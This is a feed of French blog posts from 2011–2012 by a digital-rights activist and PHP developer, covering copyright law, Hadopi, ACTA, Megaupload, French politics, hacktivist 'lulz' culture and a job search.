La révolution viendra des artisteshttp://www.paulds.fr/?p=2247http://streisand.me.thican.net/paulds.fr/index.php?20120413_095632_La_revolution_viendra_des_artistesFri, 13 Apr 2012 07:56:32 +0000Mercredi j’étais invité à participer à une soirée autour de la démocratie à la cantine : « Aux urnes, et caetera ». Lors de la dernière table ronde, sur laquelle je me suis incrusté et qui est largement partie dans des directions improbables (que devient la démocratie en cas d’infection de zombies ?) il était question des évènements qui suivront le crash du système actuel. J’y ai lâché une phrase sur laquelle j’aimerais revenir : la révolution viendra des artistes.

Pour commencer rappelons ce qu’est un artiste : celui qui crée l’art. Nous voilà bien avancé : qu’est-ce que l’art ?

L’art est, pour moi, le fait de créer dans l’intérêt unique de sa création. Je crée une chanson dans le but de la vendre, pas du business. Je crée une chanson dans le but qu’elle soit écoutée, de l’art.

Les motivations d’un artiste sont nombreuses, il peut vouloir faire passer un message, apporter un nouvel éclairage sur un style, faire avancer ou ouvrir un débat, mais dès lors qu’il essaye via sa création d’en tirer un profit personnel il n’est, pour moi, plus un artiste mais un entrepreneur.

Ce n’est pas un mal en soit, je l’ai moi-même été et je continue à trainer autour de ce monde en discutant quotidiennement avec des entrepreneurs de divers envergures, je n’exclue pas d’y revenir un jour (ce sont mes premières amours) mais ce n’est plus de l’art. A l’inverse un bloggueur qui publie dans le but d’être lu est beaucoup plus proche de ma définition de l’art : son seul intérêt (oui je sais j’élimine la pub et le personnal branling de l’équation) est d’être lu, partagé et compris et bien souvent de faire avancer la connaissance. A ce titre Wikipedia ou open street maps sont d’ailleurs pour moi parmi les oeuvres d’art les plus belles que notre civilisation (bisou à Guéant) ait produit depuis bien des années.

C’est de ces gens là et pas des artistes universal, mauvais entrepreneurs s’il en est, que je parlais : c’est de chacun de nous dès lors que l’on se motive, prend la plume, la caméra, tweete ou partage dans le simple but de faire circuler de l’information ou de la réflexion que je parlais. Nous avons le pouvoir de faire changer les choses, nous sommes les seuls à pouvoir décider de notre futur et nous sommes devenus les vrais artistes.

A vos claviers !

flattr this!

]]>
Oeuvres orphelines, quand l’état demande à la Sacem d’exploiter des auteurs inconnushttp://www.paulds.fr/?p=2221http://streisand.me.thican.net/paulds.fr/index.php?20120302_100049_Oeuvres_orphelines__quand_l___etat_demande_a_la_Sacem_d___exploiter_des_auteurs_inconnusFri, 02 Mar 2012 09:00:49 +0000Ça fait un certain temps que la problématique des œuvres orphelines est discutée du côté du législateur comme de celui des partisans d’un accès plus large à la culture en dehors du cercle marchant. Hier nos parlementaires ont fini de trancher et le résultat vaut le détour !

« L’œuvre orpheline est une œuvre protégée et divulguée, dont le titulaire des droits ne peut pas être identifié ou retrouvé, malgré des recherches diligentes, avérées et sérieuses. »  (L113-10 du CPI)

Rappelons au passage que : « L’auteur d’une oeuvre de l’esprit jouit sur cette oeuvre, du seul fait de sa création, d’un droit de propriété incorporelle exclusif et opposable à tous. » (L111-1 du CPI) et  »L’oeuvre est réputée créée, indépendamment de toute divulgation publique, du seul fait de la réalisation, même inachevée, de la conception de l’auteur. » (L111.2 du CPI). Toute création est donc protégée de facto dès sa création en France, on ne peut pas renoncer à ses droits dessus à moins d’en faire justement une œuvre orpheline : d’y renoncer en ne s’en déclarant pas l’auteur. Jusque là cette « astuce » permettait de se souscrire à un droit d’auteur contraignant si on le souhaitait. Depuis hier le cas de figure est bien différent…

Les nouveaux articles L134-1 à L134-9 du CPI précisent en effet qu’à défaut d’avoir trouvé un auteur d’une œuvre littéraire dite orpheline un tout nouveau process se met en place, permettant à des sociétés perceptrices d’exploiter commercialement cette œuvre et de percevoir des droits sur elle afin de les reverser à l’auteur dans le cas où il viendrait à être retrouvé, ou à les utiliser pour des actions d’aide à la création (ça sent l’offre légale façon Hadopi que l’on ne verra jamais) – moyennant bien sûr une commission pour l’état et une autre pour la société perceptrice de droits…

Donc en résumé : vous renoncez à la paternité de votre œuvre de la seule façon que la loi vous offre… Les charognards sont quand même là pour exploiter votre œuvre comme un vulgaire produit de consommation. Et le plus beau, c’est que pour échapper à ce système, la seule solution est de s’opposer par écrit à lui et de commencer soi-même une exploitation de l’œuvre.

Et après on me dit que le droit d’auteur est là pour protéger les auteurs…

flattr this!

]]>
A vendre : ingénieur certifié PHP 5 (moi)http://www.paulds.fr/?p=2203http://streisand.me.thican.net/paulds.fr/index.php?20120227_090048_A_vendre___ingenieur_certifie_PHP_5__moi_Mon, 27 Feb 2012 08:00:48 +0000Edit : je suis vendu caybon, je pars chez CCM Benchmark en qualité de lead dev :) Merci à ceux qui m’ont aidé en faisant circuler ce billet et à tous ceux qui m’ont proposé des postes très intéressants – j’ai normalement répondu à tout le monde et choisi le poste qui me plaisait le plus et donc dans lequel je me donnerai à fond :)

C’est un billet un peu particulier que je vous livre ici, mais après tout pourquoi pas profiter de mon blog pour essayer de me vendre ? Début avril je vais quitter Alter Way formation où je travaillais depuis l’année dernière en tant que formateur à plein temps pour revenir vers un emploi un peu plus proche du code et de la pratique. J’ai quelques propositions qui me sont ouvertes pour le moment mais j’aimerais avoir un plus large panorama et pourquoi pas trouver l’introuvable…

Mon CV est disponible dans une version épurée de mes coordonnées personnelles, même si il y manque un certain nombre de choses (travaux persos notamment), à cette adresse - version complète sur demande.

Globalement je cherche une entreprise à taille humaine, orientée vers le libre en région parisienne de préférence (mais je suis près à envisager de déménager si besoin) ayant besoin de moi.

J’ai à offrir de très solides connaissances en PHP, javascript, jQuery, mySQL, Smarty, des bases en Ruby, C, C++, Java,EXTjs, YUI, prototype, Oracle, pgSQL une forte compréhension du net et une très forte envie de m’y remettre de façon plus pratique.

Je suis particulièrement sensibilisé aux problématiques de qualité et sécurité (je travaille sur un livre à ce sujet) des codes, applications et process ainsi qu’aux performances (les formations que j’animais le plus souvent chez AWF : industrialisation, sécurité, optimisation). Je m’amuse aussi beaucoup à travailler avec les tests unitaires et je connais les principaux design patterns. Plus jeune je m’intéressais aussi beaucoup aux problématiques de SEO.

J’ai une expérience grandissante sur Prestashop (1.4, veille sur la 1.5) sur lequel je suis l’un des deux formateurs officiels actuels, et WordPress mais peux facilement m’intéresser à un autre CMS au besoin.

Je parle et écris couramment le français et l’anglais, j’ai des restes d’allemand qui reviennent bien vite chaque fois que je franchis la frontière et j’apprends le russe en ce moment.

Enfin j’ai déjà travaillé sur ZF comme Symfony sans particulièrement apprécier, mais je peux m’y remettre très simplement et très rapidement pour les besoins d’un emploi qui me plairait.

Motivé, autonome mais sachant aussi diriger comme intégrer une équipe, je m’adapte à vos besoins apprends vite les problématiques métier comme les technologies nouvelles.

Je cherche plus particulièrement un emploi de consultant ou de lead développeur en PHP mais je considérerai toutes les offres que l’on pourra m’envoyer à l’adresse suivante : q3q37636q6539736o6877546862484159693q616 (vous n’avez quand même pas cru que j’allais vous la donner en clair ? Ce serait trop simple ! – 4 opérations à réaliser)

Si vous ne parvenez pas à décoder l’adresse utilisez donc le formulaire de contact, mais avouez que c’est moins drôle ;)

Point non négociable : je travaille sous Linux, de préférence une debian-like mais pas de Windows !

flattr this!

]]>
Revoir une vidéo… 5 ans après…http://www.paulds.fr/?p=2192http://streisand.me.thican.net/paulds.fr/index.php?20120222_213311_Revoir_une_video____5_ans_apres___Wed, 22 Feb 2012 20:33:11 +0000En dehors du numérique j’ai tendance à peu parler politique pour la simple (mais bonne) raison que c’est une source à troll sans fin et que j’en ai déjà assez comme cela sur le dos… Mais là j’ai envie d’être celui qui trolle en ressortant une vidéo qui a un peu plus de cinq ans et qu’il est bon de revoir aujourd’hui, à l’approche d’un évènement de fin avril.

Bill Maher est un chroniqueur politique, réalisateur à ses heures perdues, que j’apprécie beaucoup d’écouter de temps à autre. En 2007 il nous a gratifié d’un speech sur la France que je vous livre ici en VOSTFR. On revient dessus dans un peu moins de 4mn…


Bill Maher aime les Français par Suchablog

Quelle belle image de la France Bill nous avait vendu là. Qu’en reste-t-il aujourd’hui, 5 ans après ?

La guerre en Irak

Wikileaks nous a appris que Sarkozy faisait le dos rond aux Américains en 2003 et que son opposition était finalement plus marquée envers J Chirac qu’envers la guerre elle-même. Sur le principe il n’y serait pas allé non plus, mais il est allé bien volontiers en Cote d’Ivoire. Puis il a fallu attendre que le printemps arabe gagne la Libye pour qu’à nouveau le chef de l’armée puisse jouer avec le bouton magique et commencer à s’enliser dans un conflit que l’on a tous eu peur de voir durer (sauf BHL, puisque ça assurait la promo de ses bouquins à venir).

Le système de santé

Je ne m’intéresse que très peu à ce sujet mais j’attends toujours une certaine réforme de l’hôpital promise en 2006 et je constate le déremboursement d’un grand nombre de médicaments et soins par la sécurité sociale. Je me permets aussi de souligner le rôle d’ACTA dans la lutte contre les médicaments génériques au profit des laboratoires pharmaceutiques…

Le taux de participation aux élections

J’attends de voir le résultat des prochaines présidentielles mais les dernières cantonales et régionales ont été une double douche froide avec des chutes de près de 20% du taux de participation sur les scrutins… Faut dire qu’à force d’ignorer les citoyens en politique, les citoyens finissent par ignorer la politique…

Les sujets polémiques et religieux dans les programmes politiques

Je ne reviendrai pas sur les phénomènes Christine Boutin (on se voit au Hellfest ? Le prochain j’y vais) et Le Pen fille mais sur la petite déclaration de notre président sortant devenu en un JT un candidat tout neuf à propos du mariage gay : « Nous ne voulons pas que l’on sacrifie notre identité à la mode du moment »… No comment.

La culture des Français

Ahem… Oui non je ne vais pas reparler de la Hadopi…

La politique n’est pas la sympathie envers le candidat

La droite décomplexée a décomplexé bien plus loin que la droite à mon sens et malheureusement j’ai autour de moi de plus en plus de personnes qui aimeraient prendre un croissant avec une certaine Marine… Iront-ils jusqu’à voter pour elle ? Une chose est sûre : un croissant avec n’importe lequel des candidats à cette élection ne m’intéresse pas. Ce que je remarque surtout c’est un nombre de personnes qui vont voter contre quelqu’un, ou pour le moins pire… Mais j’y reviendrai, après la présidentielle…

La vie privée est privée

Ahem… (bis) le président bling bling, la première dame « chanteuse », le fils à l’epad et le second à se faire rapatrier par les barbouzes aux frais de l’état… Bref, plus d’actualité !

Le taux de pauvreté

On m’objectera que la situation économique y est pour beaucoup, mais quand je vois ce type de graphiques je me souviens d’une phrase : « Je vous ai promis le plein emploi, je vais me battre pour le plein emploi. » – Vous voulez jouer à un jeu rigolo ? Ouvrez ce lien et comptez le nombre de combats promis qui ont réellement été menés… Indice : le taux de chômage n’est pas à 5% mais au double ;)

Bref je serai curieux de revoir une vidéo de Bill Maher à propos de la France (si tu m’entends) aujourd’hui. D’ici là ce que je vois c’est les résultats de 5 ans de politique par la peur et la division qui nous font passer pour des racistes agressifs à l’étranger (je préférai l’accordéon comme stéréotype) mais surtout qui nous font nous préoccuper de faux problèmes pour mieux nous vendre des réformes et lois qui maintiennent une élite déconnectée de la réalité au pouvoir… Merci mais non merci…

flattr this!

]]>
La problématique va bien au delà du tout gratuithttp://www.paulds.fr/?p=2185http://streisand.me.thican.net/paulds.fr/index.php?20120212_222142_La_problematique_va_bien_au_dela_du_tout_gratuitSun, 12 Feb 2012 21:21:42 +0000Depuis un certain temps déjà, faute de meilleurs arguments, les pro Hadopi (et les nouveaux pro Acta, Sopa, Pipa, …) se réfugient derrière un argument massue qu’un conseiller a probablement eu en réunion un jour : « vous voulez tout gratuit bande de vilains ».

Le dernier en date est Laurent Joffrin, directeur du Nouvel Observateur qui s’est illustré par un billet fièrement intitulé « Droit d’auteur : l’infantilisme des pirates du Net » qu’il conclura par le paragraphe suivant qui, je l’avoue, m’a décroché un sourire et l’envie de lancer mon traitement de texte :

« Autrement dit, les pirates sont sympathiques et distrayants. Mais ils sont essentiellement mus par l’agressivité, l’avarice et l’inculture. Ils sont comme leurs homologues des Caraïbes, Barbe-Noire ou Rackham-le-Rouge. Ils font rêver les spectateurs et plaisent aux enfants. Mais mieux vaut ne pas tomber entre leurs mains… »

Cette conclusion prend place à la suite d’un argumentaire farfelu (ce n’est pas de l’aggresivité monsieur Joffrin mais un constat simple de quelqu’un qui sait de quoi il parle) qui lui même part du postulat réducteur suivant : « les djeunz sont contre ACTA parce qu’ils veulent télécharger et n’en ont rien à faire de la souffrance des artistes qui travaillent si dur pour produire René la Taupe… » (ok là je caricature, mais à peine).

Monsieur Joffrin imagine que ce que les djeunz des interwebz demandent finalement c’est une mise à mort pure et simple du droit d’auteur et que c’est là la seule raison de leur opposition à ACTA (qu’il reconnaît lui-même comme « discuté [...] dans des conditions d’opacité peu démocratiques » à peine plus haut).

Alors je vais répondre de façon aussi caricaturale que monsieur Joffrin s’est exprimé en premier lieu : le droit d’auteur je m’en branle…

La problématique d’un Net libre est bien plus vaste que celle des échanges entre particuliers à but non lucratif (le piratage) et si vous aviez du mal à y croire il y a un an et demi les événements que l’on a appelé le printemps arabe devraient vous aider à comprendre de quoi l’on parle. Les tentatives de censure incessantes de l’Internet par notre gouvernement pourtant si démocratique devraient commencer à vous inquiéter. La passivité de beaucoup de médias face à certaines problématiques trouvant une réponse dans le support citoyen qu’est justement Internet…

Le droit d’auteur est effectivement à aménager. Pour le moment il sert de cheval de Troie, comme la pédopornographie avec la LOPPSI 2, à la mise en place de systèmes de censure que les dictatures nous envieront dans quelques années et certains osent encore se soucier de l’importance des revenus de quelques exilés fiscaux (à qui le piratage apporte en réalité plus qu’il ne nuit) ?

J’aime la culture, j’aime les artistes (j’ai un peu de mal avec les machines à copyright que l’on nomme actuellement artistes) mais le problème est bien plus large que celui-ci. Et si vous n’êtes pas capable de voir que l’équation réelle est celle de l’intérêt personnel de quelques machines à copyright par rapport à la démocratie elle-même alors c’est vous qui êtes infantile monsieur Joffrin (aka : c’est celui qui dit qu’il y est).

#Lulz

flattr this!

]]>
Ce que Megaupload a fait de mieux, c’est mourir…http://www.paulds.fr/?p=2171http://streisand.me.thican.net/paulds.fr/index.php?20120125_093026_Ce_que_Megaupload_a_fait_de_mieux__c___est_mourir___Wed, 25 Jan 2012 08:30:26 +0000Je n’ai jamais caché mon aversion pour Megaupload ou quelque plateforme de téléchargement en direct download (ou non) qui fait de l’argent sur le dos du partage. Je n’ai jamais non plus caché mon aversion pour le lobby du droit d’auteur (et pas le droit en lui-même) ni pour les lois qui en ont découlé à travers le monde. Ces positions peuvent paraître incompatibles de prime abord mais sont pourtant très liées : je suis pour que l’Art se trouve une nouvelle économie, se passant au maximum d’intermédiaires, et une plateforme comme Megaupload était justement un intermédiaire (ils s’envisageaient lancer une plateforme légale) dont le seul but était son profit personnel…

Avant de poursuivre il me faut cependant clarifier un point : la façon dont les arrestations et les saisies de matériel se sont opérées, la réaction en chaine des politiques se félicitant de “la mort du piratage” (no kidding, je l’ai lu quelque part), toutes ces conneries là sont indignes de la société démocratique que l’on nous vend à grand renfort de campagnes électorales tous les cinq ans. Et, bien que j’ai fêté la fin de Megaupload dignement, je reste aujourd’hui inquiet par la facilité avec laquelle les services ont été bloqués…

Et puis j’ai observé la réaction logique : you fuck with the Internet, the Internet fucks you back. Et c’est presque beau, poétique, … dommage !

Depuis des années déjà des poignées de gus dans des garages se battent contre des lois qui promettent ni plus ni moins que ce qui est arrivé ici à Megachose. Ces lois prévoient de travailler, dans la plus totale opacité, en utilisant des prétextes fallacieux pour parvenir à leurs fins, à civiliser, responsabiliser, bref censurer Internet. En France la première à entrer en vigueur fut l’Arjel… Oubliée depuis, mais toujours en fonctionnement !

Et il faut que l’on ferme Megaupload, un des pires sites se revendiquant du partage, en fait réelle pompe à fric allant à l’encontre de l’éthique sur tous les étages, pour qu’une levée de bouclier s’opère ? Dommage !

Mais finalement ce qui compte c’est d’avancer, ce qui compte c’est la mobilisation, le mouvement. Ce qui compte c’est que la mort de Megaupload, comme la création d’Hadopi avant cela (à une autre échelle), a fait prendre conscience des enjeux réels qui sous-tendent à la situation générale, à un grand nombre de personnes à travers le monde.

Le mot à la mode devient la décentralisation, les gens comprennent qu’il est possible de couper l’un des vingt sites les plus importants en termes de trafic sur un prétexte bidon (alors que les vrais ne manquaient pas) sans qu’il soit possible de rien faire… La censure est réelle, les prétextes divers et le cheval de Troie du droit d’auteur diablement efficace… Mais ce n’est pas fini, et les réels enjeux vont bien au-delà des sites de partage, les réels enjeux sont le contrôle d’Internet (LOPPSI 2), sa surveillance (Hadopi), celle des citoyens l’utilisant (CNI électronique), …

A l’échelle de la France j’ai constaté ces derniers jours un phénomène amusant : depuis la Hadopi beaucoup de monde avait migré sur le direct download (quoi qu’en dise la Hadopi), depuis la fermeture de MU et le défilage en règle des concurrents restés en ligne l’opération inverse s’opère peu à peu. Certains sont perdus et pédalent un peu dans le vocable : “où je trouve un tracker pour mon film ?” mais la passivité induite par des systèmes comme MU n’est plus, n’attendez pas 45 secondes, ne soyez pas passifs, n’ayez pas à payer et ne supportez pas de la pub porn pour voir un film en mauvaise qualité en streaming sur un site qui vous coupera de toutes façons avant la fin !

Internet retrouvera peut-être à ce rythme sa forme naturelle, où un acteur comme MU monopolisant 5% du trafic mondial pour générer des profits monstre sous couvert de légalité douteux n’a pas sa place… Alors merci le FBI de vous y être pris comme des porcs pour dézinguer un vrai ennemi du partage, mais bon courage pour la suite, ça risque d’être lulz !

Et puis pour finir en musique et pas passer (uniquement) pour un rabat-joie, la première vidéo que je relaie des Anon :

flattr this!

]]>
Je me suis (enfin) fait flasher par la Hadopihttp://www.paulds.fr/?p=2164http://streisand.me.thican.net/paulds.fr/index.php?20120110_161345_Je_me_suis__enfin__fait_flasher_par_la_HadopiTue, 10 Jan 2012 15:13:45 +0000On est mardi, tout est permis ! Et justement c’est la Hadopi qui s’y est mis et là j’en ris comme c’est pas permis. Après plus d’un an d’existence la Hadopi aurait enfin flashé un pirate ?!

Surprise (et fou rire) quand je me décide pour une raison obscure d’ouvrir une boite mail qui me sert presque plus pour regarder ce qui a pu bien tomber dedans et que j’y trouve un email dont le sujet n’est autre que “Recommandation HADOPI”. Je ne suis pas dupe et donc je vérifie un peu, l’adresse IP est la bonne, l’adresse aussi, les headers du mail ont l’air corrects…

Bon et bien appelons le numéro non surtaxé pour demander l’envoi du détail des oeuvres par courrier (so 20e siècle !) – 10 minutes d’attente, première intervenante : “allez sur trois double vé point Hadopi point fr, téléchargez le dossier, remplissez le et renvoyez le nous par voie postale pour que l’on vous réponde au plus tôt” (so 19e siècle !!).

Grmpf ! Je grogne un peu, en restant poli, et on me passe quelqu’un qui travaille à la CPD – et là une fois le numéro de dossier on me dit que ma demande est prise en compte que je la recevrai d’ici la fin de la semaine (admettons) mais que “je peux d’ores et déjà vous dire que le logiciel utilisé est transmission” (en hésitant sur le nom du client P2P livré par défaut sur pas mal de distro linux)…

Grand dieux ! Mais donc en plus ce ne serait pas un faux négatif !

J’attends donc de recevoir le détail des oeuvres et d’ici là je remercie la Hadopi de m’avoir fait penser à relancer transmission que j’avais éteint ce matin !

Pour l’anecdote et expliquer pourquoi je suis si content de ce flash : en la même période de temps qu’il aura fallu à la Hadopi pour réaliser que peut-être ma ligne n’était pas sécurisée, j’ai prouvé par 3 reprises (ici, ici et ici) que la sécurité n’était pas leur fort non plus sans parler de TMG ou du ministère de la culture ou même sans parler de l’interco TMG/Hadopi coupée par l’ami Bluetouff

Ah oui : même pas peur ;)

EDIT : pour fêter ça on se fait un petit apéro open ? Je serai à partir de 19h au week-end café (3 rue de Washington, Paris 8e) – aka mon QG – vienne qui veut !

flattr this!

]]>
Quand nos amis les politiques s’essayent au 2.0http://www.paulds.fr/?p=2156http://streisand.me.thican.net/paulds.fr/index.php?20120104_175129_Quand_nos_amis_les_politiques_s___essayent_au_2.0Wed, 04 Jan 2012 16:51:29 +0000La campagne présidentielle a commencé depuis un certain temps déjà (même si toujours pas officiellement, chaque élection ça commence plus tôt) et les élections se rapprochent à grands pas. Tous les observateurs s’accordent pour dire que plus que la précédente encore cette campagne fera la part belle à l’Internet et que celui-ci pourra peser réellement sur le résultat.

Un outil en particulier m’intéresse ici : Twitter. Le système de microblogging permet facilement et rapidement de répondre à des questions simples que les électeurs pourraient se poser. Une opportunité sans nom pour les candidats au poste de VRP de notre douce France puisque grâce à Twitter ils peuvent discuter avec les quelques 2.5 millions de français qui twittent twittent twittent…

Mais c’était sans compter sur l’habitude malsaine de nos amis politiques endurcis qui se contentent, comme on le leur a appris à Sciences-Po de se servir du réseau social comme d’un bête média traditionnel, à communication unidirectionnelle, et finissent par pondre des platitudes comme :

« Demain je serai chez <insérez ici un nom de média> pour dire du mal de <insérez ici une réforme du parti d’en face> – ne le manquez pas ! »

« Mes vœux pour 2012 <lien vers un article de type tribune dans un média de la couleur du candidat> »

et ainsi de suite… vous pouvez faire le test avec n’importe lequel des candidats actuels (exception faite de François Bayrou qui avait organisé une session de questions/réponses – lulz en soit) et constater que la belle campagne 2.0 que l’on nous a promis est en fait une bonne campagne 0.0 en utilisant rapidement des technologies qui paraissent nouvelles à la mamie du Cantal mais sont finalement utilisées bien en deçà de leur potentiel. Pour schématiser à Georgette : c’est comme acheter une moissonneuse batteuse pour tondre sa pelouse…

Alors je sais bien que les candidats eux-mêmes ne sont pas derrière leurs comptes, ce qui en soit est déjà débile, mais si vous souhaitez persister dans ce cas de figure, lâchez un minimum de lest à celui qui est derrière votre compte et autorisez lui de temps en temps à cliquer sur le bouton « reply » – petit détail cependant : Twitter c’est pire qu’un journaliste, on n’attend pas 12 heures pour répondre si on veut que sa réponse ait un minimum d’intérêt ;)

Edit : la rédaction de cet article a été motivée par un tweet de Caliméro François Hollande

flattr this!

]]>
Le lulz et la plumehttp://www.paulds.fr/?p=2141http://streisand.me.thican.net/paulds.fr/index.php?20111205_093011_Le_lulz_et_la_plumeMon, 05 Dec 2011 08:30:11 +0000Je vous préviens cet article est un grand n’importe quoi, un fourre-tout de réflexions que certains ne manqueront pas de trouver débiles… Il est simplement le fruit de ce que je suis et de pourquoi je suis là, à hurler de la façon dont je hurle pour promouvoir des choses qui me tiennent à cœur avec deux uniques armes : le lulz et la plume.

Pour ceux qui ne seraient pas au courant je me bat, au côté de nombreux autres, pour un certain nombre de valeurs parmi lesquelles la neutralité du Net, la liberté d’expression, la démocratie (pas l’oligarchie française hein, la vraie), l’accès à la culture pour tous, la mise à mal de la censure, … et pour tous ces combats bien chiants en apparence et qui nous opposent bien souvent à plus fort que nous (en apparence là aussi) j’ai à ma disposition les deux armes précédemment citées.

L’écriture est quelque chose que j’ai toujours chéri, elle était mon premier vrai emploi et conserver ce lien aux mots est la raison première de l’ouverture de ce blog. Internet est en ce cas un médium particulièrement efficace, bien plus que ne l’étaient les journaux papiers dans lesquels j’ai pu écrire durant mes jeunes années, il me donne à moi comme à tant d’autres la chance de s’exprimer sur les sujets que l’on désire et la possibilité de rencontrer un public intéressé ou intéressable.

Le lulz par contre est quelque chose de nouveau, propre à l’hacktivisme et au moyen de diffusion choisi pour publier mes écrits. C’est une arme redoutable sur laquelle j’ai suffisamment envie de m’étendre pour y consacrer ce papier.

Le lulz concrètement c’est l’art de s’amuser de tout, tout le temps, tout en avançant… C’est la chance que l’on a de pouvoir, simples citoyens, souvent sans formation politique ou juridique, intervenir auprès de gens qui ont eux ont cette culture et pourtant qui bien souvent ne nous comprennent pas. C’est aussi cette chance que l’on a de prendre du plaisir à faire ce que d’autres accomplissent en rechignant et d’y mettre tout notre cœur – pourquoi ? Parce que le sujet nous paraît suffisamment important pour y consacrer de notre temps libre et qu’au final en plus de résultats (parfois) on en retire du bon temps, des rencontres intéressantes, enrichissantes, …

Mais ce n’est pas simplement cool de vivre dans cette optique, c’est aussi nécessaire. A 24 ans je reçois toutes les semaines des mails d’insulte, d’intimidation ou de menace (parfois très sérieuses). A 24 ans j’ai passé plusieurs mois à enchaîner les nuits blanches autant que mon corps le permettait pour essayer d’obtenir des nouvelles d’amis tombés au mains d’une dictature. A 24 ans j’ai frôlé la faillite personnelle deux fois (à la création de ma première entreprise, et lorsque j’étais président du PPFR faute de pouvoir travailler sur des contrats en freelance) chaque fois pour défendre mes idées, des valeurs qui me sont chères (bien plus que ce que toute institution pourrait m’offrir lulz !). …

Faire cela sans s’amuser autant que possible est suicidaire (exemple différent, mais idée générale). Comme tout le monde j’ai un emploi qui me prend du temps dans la journée (probablement moins que certains ceci dit, j’ai aussi cette chance), comme tout le monde j’ai des problèmes dans ma vie perso, comme tout le monde des fois j’ai envie de souffler, … Mais au final je sais pourquoi et comment je suis là, à faire chier mon monde de façon professionnelle (« chieur professionnel » est souvent la dénomination que je donne lorsque l’on me demande ce que je fais dans la vie).

Alors oui je m’amuse à faire ce que je fais, je ne vais pas en rougir, d’autant que je ne perds pas de vue les objectifs que je me fixe et souvent je passe des nuits blanches à bosser sans aucune contrepartie autre que ce lulz, ces rencontres, et cet incroyable enrichissement… Finalement c’est plutôt pas mal, mais je ne dois rien à personne !

Il y a bien quelques haterz, toujours aigris, pour reprocher sans agir et se fendre de piques assassines envers ceux qui se bougent le cul pour le plaisir de se bouger le cul (le premier qui fait une référence à la wiiboard a perdu !) mais franchement on apprend à les ignorer et à avancer malgré eux. Le plus drôle est finalement de voir que ces mêmes personnes qui cassent du sucre sur le dos des pratiquants du lulz (souvent à coup de « tu te mets en avant ») sont ceux qui ne tiendraient pas une semaine au rythme que nous nous imposons tous ou ne risqueraient pas la moitié de ce que l’on risque chaque jour pour défendre des idées qu’ils partagent pourtant parfois.

Je ne me considère pas comme « connu » et si je pouvais éviter de le devenir je m’en porterai aussi bien. La seule chose que je cherche à faire en partageant un peu plus que de plates réflexions, en y apportant ma bonne humeur et mes coups de gueules, est de te fédérer suffisamment de monde(s) autour de mes moyens de communication pour que ceux-ci aient une certaine influence sans pour autant tuer d’ennui la moitié de mes lecteurs. Je veux pouvoir soulever des problématiques parfois ignorées ou négligées afin qu’elles soient débattues sérieusement à des niveaux auxquels je n’ai pas accès moi-même et auxquels je ne souhaite certainement pas avoir accès (oui je parle de la politique là). Et jusque là j’ai plutôt l’impression que l’on va dans le bon sens et que l’effort investi (par tous) a trouvé son lot de conséquences et que l’on commence à être entendus et mieux encore : parfois on nous écoute même !

D’abord ils vous ignorent, ensuite ils vous raillent, ensuite ils vous combattent et enfin, vous gagnez.

Bref engagez vous, on s’amuse bien et ça sert vraiment ! :)

flattr this!

]]>
Youtube, cette nouvelle board Warez…http://www.paulds.fr/?p=2135http://streisand.me.thican.net/paulds.fr/index.php?20111125_162723_Youtube__cette_nouvelle_board_Warez___Fri, 25 Nov 2011 15:27:23 +0000Il parait que c’est illégal et que ce sera la prochaine mission de la Hadopi (3e du nom, c’est toujours les pires des trilogies) mais le streaming est vachement utile pour découvrir de nouveaux artistes musicaux que l’on aurait ensuite envie de télécharger sur un truc propre du genre P2P (comment ça c’est interdit aussi ?) pour aller ensuite les voir en concert par exemple (ça on a toujours le droit ?). En tête de liste de ces sites bien pratiques regorgeant de musique et intégrant des suggestions parfois pas débiles se trouve bien sûr le géant Google et sa plateforme non moins conséquente Youtube…

Et jusque là tout se passait bien, la musique est souvent accompagnée d’une image fixe, d’un montage vidéo du plus bel effet ou des paroles… Bref un outil sympa quand on est en itinérance et que l’on veut sortir de sa collection de FLAC bien propres pour découvrir des choses que l’on n’entendrai jamais à la radio… Il y avait bien des pubs, mais elles ne gênaient pas, elles s’affichaient sur la vidéo qui était de toutes façons dans un autre onglet que l’on ne ré-affiche que pour changer de chanson… et elle ne rapportait de sous qu’à Google si je ne m’abuse.

Et puis est arrivée la pub vidéo, un spot inintéressant dans 95% des cas (je cherche toujours les 5% restants mais je suis optimiste de nature) que l’on peut zapper (et que l’on zappe) parfois au bout de quelques secondes. Les recettes de la publicité en question sont partagées à pourcentage égal entre Google et la personne qui a mis en ligne la vidéo (non je déconne, Google s’en met plein les fouilles, ça change d’Apple et iTunes non ?). Cool ! De l’argent pour les artistes et de la musique pour le public, intéressant comme idée !

Oui mais non, les artistes (leurs maisons de disque) doivent penser que le streaming en question est mauvais pour leur business et à quelques rares exceptions près (top 50 et vieux hits) que l’on trouve sur Vevo, la découverte, même rétribuée, n’est toujours pas encouragée (cf le cas Deezer vs Universal).

Le résultat est simple : des fans (ou des business mans du warez, ça dépend des fois) en profitent pour uploader la musique qui manque en activant bien les pubs bien chiantes, retirant au passage les sous-sous qui devraient aller aux créateurs à la base s’ils avaient fait le travail eux-même… La nature a horreur du vide et Youtube c’est un peu pareil… Résultat le catalogue de ce qui est disponible sur la plateforme est assez impressionnant et la pub commence à se faire bien présente alors que les revenus des artistes réfractaires eux ne bougent pas…

Alors messieurs les uploaders du dimanche, soyez fair-play : c’est sympa de mettre de la musique en ligne, ça profite à tout le monde (à commencer par les artistes) mais la pub pique un peu dans 95% des cas et il n’y a aucune logique à ce que vous en perceviez le bénéfice…

Et mes chers amis artistes : profitez en ! Je sais que ça peut paraître bizarre, mais le plus vous serez partagés le plus vous aurez de succès… C’est tout con comme équation mais ça marche ! ;)

flattr this!

]]>
Pour que ce soit clairhttp://www.paulds.fr/?p=2127http://streisand.me.thican.net/paulds.fr/index.php?20111031_172042_Pour_que_ce_soit_clairMon, 31 Oct 2011 16:20:42 +0000Et pour ceux qui n’ont pas Twitter

flattr this!

]]>
Piratons la démocratie est (enfin) disponible en version papierhttp://www.paulds.fr/?p=2123http://streisand.me.thican.net/paulds.fr/index.php?20111013_112240_Piratons_la_democratie_est__enfin__disponible_en_version_papierThu, 13 Oct 2011 09:22:40 +0000En ces temps troubles où les génies disparaissent et où l’on ne peut pas se fier à un spam en bonne et due forme, il est bon de revenir aux valeurs d’antan. Aussi j’ai le plaisir aujourd’hui de vous annoncer la sortie de la version papier de Piratons la démocratie.

Après de nombreux contre-temps à la fois liés au livre en lui-même et à ma vie personnelle d’autre part, le livre a finalement trouvé sa place dans le catalogue d’In Libro Veritas ce matin aux alentours de 10 heures.

Il est bien sûr toujours disponible en version PDF gratuite et des versions HTML5, texte brut et epub devraient arriver d’ici peu (en même temps qu’un site pour discuter autour du sujet).

D’ici là, si comme moi vous aimez le bruit et l’odeur du papier suivez le curseur blanc !

